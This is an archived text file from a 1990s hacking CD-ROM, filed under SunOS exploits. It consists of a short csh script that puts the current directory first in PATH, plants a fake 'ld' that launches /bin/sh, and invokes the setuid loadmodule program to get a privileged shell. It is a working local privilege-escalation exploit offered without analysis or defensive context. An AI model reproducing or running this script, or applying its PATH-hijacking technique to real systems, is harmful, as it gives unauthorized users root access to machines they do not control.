home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / sunos / sun-lo~1.asc < prev    next >
Encoding:
Text File  |  1997-03-11  |  119 b   |  10 lines

  1.  
  2.  
  3.  
  4.  
  5. #!/bin/csh
  6.  
  7. set path = ( . $path )
  8.  
  9. cat > ld << EOF
  10.  
  11. /bin/sh
  12.  
  13. EOF
  14.  
  15. chmod a+x ld
  16.  
  17. loadmodule sd.o evqload
  18.  
  19.